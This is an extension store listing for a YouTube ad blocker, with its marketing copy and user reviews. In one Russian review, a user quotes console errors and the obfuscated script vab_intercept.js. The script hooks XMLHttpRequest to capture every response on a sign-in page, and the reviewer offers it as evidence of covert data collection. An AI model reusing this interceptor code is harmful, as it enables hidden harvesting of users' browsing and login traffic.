• 186 reviews
Video Ad Blocker Plus for YouTube™
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Video Ad Blocker Plus for YouTube™

Enhance Your Video Watching Experience with the Best Ad Blocker for Chrome

Enjoy Videos Without Distractions

Are you tired of being interrupted by pesky ads while watching your favorite videos on YouTube? With our ad blocker extension for Chrome, you can now enjoy a seamless video watching experience from start to finish. Say goodbye to annoying ads that disrupt your viewing pleasure.

No More Ads, Guaranteed

Our ad blocker specializes in efficiently removing all types of ads, ensuring that your video playback remains uninterrupted. Whether it's pre-roll ads, banner ads, or pop-ups, our extension takes care of them all, leaving you with a clean and ad-free viewing experience.

Lightweight and Efficient

Worried about your browser slowing down due to an ad blocker? Don't be! Our extension is lightweight and designed to work seamlessly in the background, ensuring that your browsing experience remains fast and efficient.

Save Bandwidth, Save Time

Ads not only interrupt your viewing experience but also consume valuable bandwidth. Our ad blocker prevents ads from loading, saving your bandwidth and allowing you to enjoy videos without any unnecessary delays.

Stay Safe with Adult Content Warning

When browsing the internet, you may come across websites with adult content that you'd rather avoid. Our extension has your back. It detects and warns you about potentially unsafe adult content, ensuring a safer and more family-friendly browsing experience.

Install for Free and Enjoy

Our ad blocker extension is completely free to use. Install it now and start enjoying videos the way they were meant to be watched - without ads and distractions.

After installing, make sure to reload all YouTube tabs for the extension to take effect.

About Our Privacy Policy

We value your privacy and want to assure you that we handle your data responsibly. We receive and process anonymous and de-identified browsing data to identify adult content and provide contextual warnings. Our privacy policy, which can be found here , provides detailed information on how we handle your data and the permissions required by our extension.

Enjoy ad-free videos

Efficient and lightweight ad blocker

Warns against adult content

Requires reloading YouTube tabs after installation

Collects and processes browsing data

186 reviews
10 Reviews For This Extension
Олег Григорьев astra5555

Это расширение нRefused to connect to 'https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-8323632-39&cid=556507824.1691039181&jid=1087444301&gjid=1405009030&_gid=1985690116.1691039232&_u=SCGAiEABRAAAAGAFO~&z=1622428135' because it violates the following Content Security Policy directive: "connect-src api.advpartners.org api.flocktory.com go.playmmogames.com wgevents.net lesta.ru *.lesta.ru *.lstprod.net *.lstdev.net *.wgevents.net *.onetrust.com *.cookielaw.org *.visualwebsiteoptimizer.com *.googleapis.com *.google-analytics.com *.analytics.google.com *.wargaming.net *.yandex.ru *.yandex.net *.yandex.ua *.yandex.by *.yandex.kz *.yandex.com.tr". Контекст https://eu.wargaming.net/id/signin/?next=%2Fid%2Fopenid%2F29307516008882882%2F&trust_root=https%3A%2F%2Feu.wargaming.net%2Fshop%2F Трассировка стека vab_intercept.js:20 (WEtqP.send) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 (function XrTg() { function qyFH() { var WEtqP = XMLHttpRequest.prototype, Avnxq = WEtqP.send, PicqR = WEtqP.open; (((WEtqP.open = function (IsqDs, gcVjb) { return ((this.url = gcVjb), PicqR.apply(this, arguments)); }), (WEtqP.send = function () { return (this.addEventListener("load", function () { var BqoKt = null; try { ((BqoKt = this.responseText)) } catch (Avnxq) {};;; var ZURip = new CustomEvent("oPzpd", { detail: BqoKt, url: this.url }); (self.dispatchEvent(ZURip)) }), Avnxq.apply(this, arguments)); }))) }; ((self.LkoWQ = (self.LkoWQ || {}))); function NWtC() { function imPY(ZtuWZ) { let mFXiL = ""; for (let llRBr = 0, EMQgA = ""; (llRBr < ZtuWZ.length); llRBr++) { ((EMQgA += ZtuWZ.charAt(llRBr))); if ((EMQgA.length === 2)) { ((mFXiL += String.fromCharCode((parseInt(EMQgA, 36) - 3)))); ((EMQgA = "")) } }; return mFXiL; }; const KzpnM = LkoWQ.SYg; ((KzpnM.class = class SYg { uxGM() { (qyFH()) } })); ((KzpnM.instance = new KzpnM.class())); (KzpnM.instance.uxGM()) }; ((LkoWQ.SYg = { init: NWtC })); (NWtC()) })(); Refused to connect to 'https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-150089307-8&cid=556507824.1691039181&jid=2008752142&gjid=626891185&_gid=1577892092.1691039183&_u=QACAAEAAQAAAACAEO~&z=1754386292' because it violates the following Content Security Policy directive: "connect-src api.advpartners.org api.flocktory.com go.playmmogames.com wgevents.net lesta.ru *.lesta.ru *.lstprod.net *.lstdev.net *.wgevents.net *.onetrust.com *.cookielaw.org *.visualwebsiteoptimizer.com *.googleapis.com *.google-analytics.com *.analytics.google.com *.wargaming.net *.yandex.ru *.yandex.net *.yandex.ua *.yandex.by *.yandex.kz *.yandex.com.tr". Unchecked runtime.lastError: Could not establish connection. Receiving end does not exist. Refused to connect to 'https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-40205758-23&cid=556507824.1691039181&jid=1130560681&gjid=311498366&_gid=1985690116.1691039232&_u=QCEIgEBBQAAAAGAEa~&z=433947792' because it violates the following Content Security Policy directive: "connect-src 'self' checkoutshopper-live.adyen.com *.addthis.com *.googleapis.com *.google-analytics.com *.analytics.google.com *.wargaming.net *.wgprod.net *.yandex.ru *.yandex.net *.yandex.ua *.yandex.by *.yandex.kz *.yandex.com.tr aj2113.online *.cookielaw.org *.onetrust.com *.bepaid.by pagead2.googlesyndication.com adservice.google.com/pagead www.google.com *.crazyegg.com".арушает правила Интернет-магазина Chrome.


doesnt work WHY YOU LIE FOR?

Duren Dol

It works amazing

robert kiel

this does not block youtube ads at all, don't install it

prabath nipun kumara

it was 100% block ads but now only 1 ads play when start every video can you fix it ?

Kevin Thomas

It was working fine but it has stopped working....please do something....


It blocked some videos which weren't disruptive from loading

Henrique Cruz

This video gets blocked by the extension, for some reason. https://www.youtube.com/watch?v=b_YHmcPMbBk&ab_channel=TheHoofGP Otherwise, great plug-in.


bad. hated it.

Reedzer Natumi

it work perfect for meny years but over this passt year i starded getting ads anyway in youtube and i tryed removed it reinstalled it and noting really changed so plz help

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